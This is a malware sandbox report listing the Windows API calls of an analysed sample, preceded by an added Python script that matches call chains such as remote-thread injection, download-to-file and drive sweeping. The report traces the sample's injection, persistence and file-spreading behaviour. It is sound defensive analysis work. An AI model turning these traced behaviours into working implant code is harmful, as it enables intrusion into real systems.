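The per-function API lists in this section read as ordered chains: LookupPrivilegeValueA and AdjustTokenPrivileges followed by VirtualAllocEx, WriteProcessMemory and CreateRemoteThread in the function at 02B6CC92; InternetOpenUrlA, InternetReadFile and WriteFile at 02B6B888; socket(2, 2, 0), that is AF_INET/SOCK_DGRAM, followed by bind at 02B639F0; and GetLogicalDrives, GetDriveTypeA and CreateFileA with desired access 80000000 (GENERIC_READ) at 02B6DD99. The block below is an added example, not code from the report, the sample or Joe Sandbox: it parses lines in the report's own "API.MODULE(args), ref: ADDR" format and matches such chains as ordered subsequences, with optional constraints on recovered argument values so that a "?" the sandbox could not resolve never satisfies a constraint. The rule names are ours. The trace it runs on is constructed: the download, socket and drive lines are copied from the lists above, while the first six lines use "?" for every argument and carry the start address of the CFG block containing the call as ref, because the report does not print those call sites. One caveat when reading these lists: FindCloseChangeNotification right after a CreateFileA or a token handle is almost certainly CloseHandle; the two kernel32 exports resolve to the same code, and address-based symbolization shows the alias.

```python
"""Match ordered API chains in Joe Sandbox style API lists.

Added example, not code from the report, the sample or Joe Sandbox. The trace
below is constructed from this report's API lists; refs for the first six
lines are CFG block starts, since the report does not print those call sites.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Matches report lines such as
#   CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
#   GetLogicalDrives.KERNEL32 ref: 02B6DFAF          (no argument list)
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple[str, ...]   # hex strings as printed; "?" when the sandbox could not recover a value
    ref: int


def parse_trace(text: str) -> list[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m is None:
            continue
        raw = m["args"] or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg_is(index: int, value: int):
    """Constraint: argument `index` equals `value`; an unrecovered '?' never satisfies it."""
    def check(call: Call) -> bool:
        try:
            return int(call.args[index], 16) == value
        except (IndexError, ValueError):
            return False
    return check


# A rule is an ordered chain of (API name, constraints). Unrelated calls may sit
# between steps, which is how these chains appear in the per-function lists above.
RULES = {
    "privilege_adjust": [("LookupPrivilegeValueA", []), ("AdjustTokenPrivileges", [])],
    "remote_thread_injection": [("VirtualAllocEx", []), ("WriteProcessMemory", []),
                                ("CreateRemoteThread", [])],
    "download_to_file": [("InternetOpenUrlA", []), ("InternetReadFile", []), ("WriteFile", [])],
    # socket(AF_INET=2, SOCK_DGRAM=2, 0) followed by bind(): a UDP listener
    "udp_listener": [("socket", [arg_is(0, 2), arg_is(1, 2)]), ("bind", [])],
    # GetLogicalDrives -> GetDriveTypeA -> CreateFileA(GENERIC_READ = 0x80000000)
    "drive_sweep": [("GetLogicalDrives", []), ("GetDriveTypeA", []),
                    ("CreateFileA", [arg_is(1, 0x80000000)])],
}


def match_chain(calls: list[Call], chain) -> list[int] | None:
    """Refs of the calls satisfying the chain in order (subsequence match), or None."""
    refs, pos = [], 0
    for api, constraints in chain:
        while pos < len(calls):
            call = calls[pos]
            pos += 1
            if call.api == api and all(ok(call) for ok in constraints):
                refs.append(call.ref)
                break
        else:
            return None
    return refs


def scan(text: str) -> dict[str, list[int]]:
    """Rule name -> matched call refs, for every rule whose chain occurs in the trace."""
    calls = parse_trace(text)
    hits = {}
    for name, chain in RULES.items():
        refs = match_chain(calls, chain)
        if refs:
            hits[name] = refs
    return hits


# Constructed trace: the download, socket and drive lines are copied from this
# report; the first six lines are constructed (arguments unknown, refs are block starts).
SAMPLE_TRACE = """
LookupPrivilegeValueA.ADVAPI32(?,?,?), ref: 02B6CE4F
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?), ref: 02B6CEE0
CreateMutexA.KERNEL32(?,?,?), ref: 02B6D0B0
VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02B6D0CA
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 02B6D102
CreateRemoteThread.KERNEL32(?,?,?,?,?,?,?), ref: 02B6D134
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02B6B95B
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 02B6B98D
CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02B6B9C2
InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 02B6B9E8
WriteFile.KERNEL32(000000FF,00000000,00000000,00000104,00000000), ref: 02B6BA30
socket.WS2_32(00000002,00000002,00000000), ref: 02B639F0
setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 02B63A2E
bind.WS2_32(?,00000002,00000010), ref: 02B63A44
Sleep.KERNEL32(00004E20), ref: 02B6DF9F
GetLogicalDrives.KERNEL32 ref: 02B6DFAF
GetDriveTypeA.KERNEL32(?), ref: 02B6E032
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
"""

if __name__ == "__main__":
    for rule, refs in scan(SAMPLE_TRACE).items():
        print(rule, [f"{r:08X}" for r in refs])
```

The subsequence match is deliberately loose: a chain fires even when helper calls sit between its steps, which matches how the per-function lists above interleave Sleep, mutex and subroutine calls with the interesting APIs. The cost is false positives on large traces, so constrain arguments where the report recovered them (the socket type, the CreateFileA access mask) and run the rules per function rather than over a whole-process trace.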

                                Control-flow Graph (legend: Executed / Not Executed)
                                • Function 02B6E6F0, blocks 02B6E6F0-02B6ED34; calls: LoadLibraryA, RegOpenKeyExA (x4), RegSetValueExA (x5), RegCloseKey (x2), GetComputerNameA, CreateFileMappingA, CharLowerA, GlobalAlloc, subs 02B73600, 02B6DC56, 02B61444, 02B61B0E, 02B659DE, 02B613E8.
                                APIs
                                  • Part of subcall function 02B6DC56: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02B6DC9D
                                  • Part of subcall function 02B6DC56: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02B6DCCB
                                  • Part of subcall function 02B6DC56: RegCloseKey.KERNEL32(?), ref: 02B6DCD8
                                • LoadLibraryA.KERNEL32(?), ref: 02B6E766
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 02B6E85E
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E88D
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6E89A
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02B6E8BA
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E8E9
                                • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 02B6E93D
                                • RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,00000000), ref: 02B6E9CC
                                • RegSetValueExA.KERNELBASE(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6E9FF
                                • RegSetValueExA.KERNELBASE(00000000,?,00000000,00000004,00000000,00000004), ref: 02B6EA2A
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,00000004,00000001,00000004), ref: 02B6EA55
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6EA62
                                • GetComputerNameA.KERNEL32(00000000,00000080), ref: 02B6EA80
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,?), ref: 02B6EAF9
                                • CharLowerA.USER32(c:\windows), ref: 02B6ED06
                                • GlobalAlloc.KERNEL32(00000040,00021000), ref: 02B6ED13
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$Open$Close$AllocCharComputerCreateFileGlobalLibraryLoadLowerMappingName
                                • String ID: c:\windows$n
                                • API String ID: 2451392965-3198247416
                                • Opcode ID: 47b5c9bf75e07167d73b15eeec557572be9e0c1dfbfbb9db9a39256cef901a7b
                                • Instruction ID: 1fe3d31b519234987f84e6c34e1e0e22398861981ec84882dc0cb45ab41df8f2
                                • Opcode Fuzzy Hash: 47b5c9bf75e07167d73b15eeec557572be9e0c1dfbfbb9db9a39256cef901a7b
                                • Instruction Fuzzy Hash: 6DF17EB5D80214DFEB20DBA4DC9CFAA7779BB48342F0449D8F209AB281D7B45A94CF54

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00000400), ref: 02B6E550
                                • LoadLibraryA.KERNEL32(00000000), ref: 02B6E57C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 02B6E59E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000DD99,00000000,00000000,00000000,00000000,00000000), ref: 02B6E61E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000CC39,00000000,00000000,?,00000000,00000000), ref: 02B6E645
                                • Sleep.KERNEL32(00000400), ref: 02B6E659
                                • Sleep.KERNEL32(00000400), ref: 02B6E67F
                                • CreateThread.KERNEL32(00000000,00000000,02B6CA87,0000005A,00000000,?,00000000,00000000), ref: 02B6E6AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateSleepThread$AddressLibraryLoadProc
                                • String ID: Z
                                • API String ID: 3386919701-1505515367
                                • Opcode ID: 027bb4e192a755716d405bee4929be617e877f606e936b90ddfba984a7197899
                                • Instruction ID: fe5df30674f3dacd876b8af209bc72bcb0d50fe659818b22139ad700852fb62f
                                • Opcode Fuzzy Hash: 027bb4e192a755716d405bee4929be617e877f606e936b90ddfba984a7197899
                                • Instruction Fuzzy Hash: 8C418E79D80354EBEB11AB90EC0DFE53738AB08742F004895F24AAB180D7F459D4CF55

                                Control-flow Graph

                                APIs
                                • SetErrorMode.KERNEL32(00008002), ref: 02B6ED52
                                  • Part of subcall function 02B6E6F0: LoadLibraryA.KERNEL32(?), ref: 02B6E766
                                  • Part of subcall function 02B6E6F0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,00000000), ref: 02B6E85E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000D570,00000000,00000000,00000000,00000000,00000000), ref: 02B6EDA5
                                • CreateThread.KERNEL32(00000000,00000000,Function_000053B2,00000000,00000000,?,00000000,00000000), ref: 02B6EDCC
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000E507,00000000,00000000,?,00000000,00000000), ref: 02B6EDF3
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003FAA,00000000,00000000,?,00000000,00000000), ref: 02B6EE1A
                                • CreateThread.KERNEL32(00000000,00000000,Function_000057A0,00000000,00000000,?,00000000,00000000), ref: 02B6EE41
                                  • Part of subcall function 02B6F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                  • Part of subcall function 02B6F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00001189,00000000,00000000,?,00000000,00000000,00000001), ref: 02B6EF9E
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003911,00000000,00000000,?,00000000,00000000), ref: 02B6EFC5
                                • CreateThread.KERNEL32(00000000,00000000,Function_00003D9B,00000000,00000000,?,00000000,00000000), ref: 02B6EFEC
                                • Sleep.KERNEL32(00000200), ref: 02B6F009
                                  • Part of subcall function 02B67C71: MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00015400), ref: 02B67CA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Create$Thread$File$View$ErrorLibraryLoadMappingModeOpenSleep
                                • String ID:
                                • API String ID: 4067783054-0
                                • Opcode ID: 5500f2b1e149979270730a1ee2aed56eb19fa2e2be9d01c632da26fb855ffde4
                                • Instruction ID: 492ea4d9140c265d2cd31a296f2b54d5ce69d48a8e051451d97541e8301306da
                                • Opcode Fuzzy Hash: 5500f2b1e149979270730a1ee2aed56eb19fa2e2be9d01c632da26fb855ffde4
                                • Instruction Fuzzy Hash: 05713C75B91314BBFB60AB90DC5AFF97375AB05B01F1044E4B20A7A1C0DBF86A848F56

                                Control-flow Graph

                                APIs
                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000,?), ref: 02B6BF11
                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02B6BF5A
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02B6C022
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 02B6C040
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 02B6C055
                                • SetEndOfFile.KERNEL32(000000FF), ref: 02B6C062
                                • DeleteFileA.KERNEL32(00000000), ref: 02B6C0A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$Pointer$CreateDeleteReadWrite
                                • String ID: D
                                • API String ID: 529351820-2746444292
                                • Opcode ID: e02fcc8e9df502e86db3a4160bff2433ea3350cfb23b5df8ebbc49c485aab7e4
                                • Instruction ID: eb8f7d9fd88b4336a8091be7d0c08a06528fe0abf8909f4f97de706fb79dd561
                                • Opcode Fuzzy Hash: e02fcc8e9df502e86db3a4160bff2433ea3350cfb23b5df8ebbc49c485aab7e4
                                • Instruction Fuzzy Hash: E1A14EB5940218EFDB20DF94DC4CBEAB7B5EB48305F1089C9F609AB280D7B95A84CF55

                                Control-flow Graph

                                APIs
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02B6F822
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 02B6F8F6
                                • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 02B6F96F
                                • RegCloseKey.KERNEL32(00000000), ref: 02B6FCD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseEnumNameOpenUserValue
                                • String ID:
                                • API String ID: 3905208545-0
                                • Opcode ID: 4c83ff623018d4b09f9099d0e0f6907be4f5803f461121e74c37b96abeae87ec
                                • Instruction ID: d2983f8cac2445d8dc31d072c2d7808a1e19098c1c6c03cd7b132fde1c83e6a4
                                • Opcode Fuzzy Hash: 4c83ff623018d4b09f9099d0e0f6907be4f5803f461121e74c37b96abeae87ec
                                • Instruction Fuzzy Hash: B9E11571941228EBDB24DB54EC8CBF9B7B5EB58304F1086D9E50AAB250D7789AC4CF90

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00004E20), ref: 02B6DF9F
                                • GetLogicalDrives.KERNEL32 ref: 02B6DFAF
                                • GetDriveTypeA.KERNEL32(?), ref: 02B6E032
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 02B6E074
                                • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 02B6E11F
                                • GetFileAttributesA.KERNEL32(?), ref: 02B6E214
                                • GetFileAttributesA.KERNEL32(?), ref: 02B6E2B7
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6E30D
                                • WriteFile.KERNEL32(?,?,00000000), ref: 02B6E40F
                                • SetFileTime.KERNEL32(?,?,?,?), ref: 02B6E431
                                • FindCloseChangeNotification.KERNEL32(?), ref: 02B6E43E
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02B6E44D
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 02B6E469
                                • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 02B6E49C
                                • SetFileAttributesA.KERNEL32(?,00000007), ref: 02B6E4B8
                                • Sleep.KERNEL32(00001B58), ref: 02B6E4C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: File$Attributes$Create$SleepWrite$ChangeCloseDriveDrivesFindLogicalNotificationReadTimeType
                                • String ID: :$\
                                • API String ID: 2942510372-1166558509
                                • Opcode ID: 6d408ae051202b68c5254529c7756bf682b1e228cbdb1f3b2f5f417db3968e01
                                • Instruction ID: 6588ceb5d4147a8aed3597e9a9e46a9d0c766f87418cef896b5b1f058fefa3e8
                                • Opcode Fuzzy Hash: 6d408ae051202b68c5254529c7756bf682b1e228cbdb1f3b2f5f417db3968e01
                                • Instruction Fuzzy Hash: 43517875D00268DBDB24DB64CC88BFEB7B6FB85345F0485C9E109EA280D7789AA5CF50

                                Control-flow Graph

                                APIs
                                • RegOpenKeyExA.KERNEL32(02B653F7,?,00000000,000F003F,02B653F7), ref: 02B64408
                                • RegEnumValueA.KERNEL32(02B653F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02B6443F
                                • RegDeleteValueA.KERNEL32(02B653F7,?), ref: 02B64468
                                • RegEnumKeyExA.KERNEL32(02B653F7,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02B644A0
                                • RegDeleteKeyA.ADVAPI32(02B653F7,?), ref: 02B644FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: DeleteEnumValue$Open
                                • String ID:
                                • API String ID: 3197069048-0
                                • Opcode ID: 3dec9c815a024576ae3783739863fa353311bfd75c057c0a3e4ad06c4e751d30
                                • Instruction ID: 4c28fe92a2ed5dc868e926c50f9c2d227f411bff9f97900945fbff37c5cd7ae4
                                • Opcode Fuzzy Hash: 3dec9c815a024576ae3783739863fa353311bfd75c057c0a3e4ad06c4e751d30
                                • Instruction Fuzzy Hash: 75311CB5900208EBDF24DF94DC99FEE77B8AB48704F10C588A715AB181D7B49648CF54

                                Control-flow Graph

                                APIs
                                • socket.WS2_32(00000002,00000002,00000011), ref: 02B63008
                                • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02B63072
                                • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 02B6314A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: selectsendtosocket
                                • String ID: @
                                • API String ID: 4221616969-2766056989
                                • Opcode ID: f39e8eedee454057849f98a2261c6dabc097c01456e66d4724b635d08ce40317
                                • Instruction ID: 92e42123d5c937a3895541d8fc85c08b38f66d5971b6a516175cf2a3e64668ab
                                • Opcode Fuzzy Hash: f39e8eedee454057849f98a2261c6dabc097c01456e66d4724b635d08ce40317
                                • Instruction Fuzzy Hash: E1819F71D081A88BEF28CB24CC947F9B7B5AF44714F4442D9E299AA2C0D7B85EC8CF51
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02B6DC9D
                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02B6DCCB
                                • RegCloseKey.KERNEL32(?), ref: 02B6DCD8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CloseOpenValue
                                • String ID: >
                                • API String ID: 779948276-325317158
                                • Opcode ID: f01ee12258c3602c3a30207e9e1a345556b2181ee65a9de0405e46da9aa1e186
                                • Instruction ID: 27aed057579cf11cccf5e3404ac91c512fe2c9b1aa433b68c806f8395f5c4809
                                • Opcode Fuzzy Hash: f01ee12258c3602c3a30207e9e1a345556b2181ee65a9de0405e46da9aa1e186
                                • Instruction Fuzzy Hash: 1C318FB5A50218EBDB20DB58DC48FF9B378EB59340F008AC9E6496B241D6F45ED4CF90
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02B61938
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: 33bdb4f922a3212c19a8701d8a349d277899aedb48a91e3116dd26d83c1efaae
                                • Instruction ID: 5d9a5528d8e6d4216430e320a8492880f5ca04ec4dbfd5fac87978ff7d56d59a
                                • Opcode Fuzzy Hash: 33bdb4f922a3212c19a8701d8a349d277899aedb48a91e3116dd26d83c1efaae
                                • Instruction Fuzzy Hash: 06917C75D44118EBDB28DB54CC89BEAB7B9EB58340F0049D8E719AB240D7B49AC4CFA0
                                APIs
                                • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 02B6DBEC
                                • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02B6DC08
                                • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 02B6DC26
                                • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02B6DC42
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Value$CreateOpen
                                • String ID:
                                • API String ID: 4052006930-0
                                • Opcode ID: 8de3985c2e15d552c614923b10160ae97f0c16a951050651d8eb9a7792e4d56d
                                • Instruction ID: 61b72b6cec8e6bdb61e9cdf951c193afe7cb7b49694cfabccc94c6c3899865af
                                • Opcode Fuzzy Hash: 8de3985c2e15d552c614923b10160ae97f0c16a951050651d8eb9a7792e4d56d
                                • Instruction Fuzzy Hash: 681118B9A4020CFBDB04DFE0D859FAE77B8AB48740F108948FB05AB181D7B09A14CB60
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00D50902
                                • FindCloseChangeNotification.KERNEL32 ref: 00D5091A
                                • Sleep.KERNEL32(00002710), ref: 00D50925
                                Memory Dump Source
                                • Source File: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseCreateFindMutexNotificationSleep
                                • String ID:
                                • API String ID: 607942068-0
                                • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction ID: 6d82110f3067272ac406c902b8e35d0f0fc24ad3606d15d58415e20745d4d771
                                • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                • Instruction Fuzzy Hash: 5FB16B75A002898FEF10CF14CD84BA93BA5FF54305F4C4915DC4DAF2A1D775AA88CB9A
                                APIs
                                  • Part of subcall function 02B6F030: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,02B63DE7), ref: 02B6F067
                                  • Part of subcall function 02B6F030: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,02B63DE7), ref: 02B6F08E
                                • Sleep.KERNEL32(000493E0,00000001), ref: 02B63DFE
                                • CreateThread.KERNEL32(00000000,00000000,02B63B41,00000000,00000000,00000000,00000000,00000000), ref: 02B63E78
                                • Sleep.KERNEL32(00000100), ref: 02B63ECA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateFileSleep$MappingThreadView
                                • String ID:
                                • API String ID: 3768528361-0
                                • Opcode ID: e1a6033c37280a82efed4fcb881ec580b699d57f76ff6dd6ac5fd4cd79a15600
                                • Instruction ID: f914c4d17b365f24f106985976229bf6d8d53919bfb90e3735c6ae9e5f2c126b
                                • Opcode Fuzzy Hash: e1a6033c37280a82efed4fcb881ec580b699d57f76ff6dd6ac5fd4cd79a15600
                                • Instruction Fuzzy Hash: 3B313FB0D44218DBDB20AB90ED497FA76B5EB10746F0044E8E3067B1C1DBB81AD4CE7A
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: c61255169513443e4db2d932c18a706cd183cd4ada0f5ce52f18c3f24b042259
                                • Instruction ID: 0f34f7ee918224eb202c835c357461042cdf6a2af0b2ad759bedaff176b9ac8d
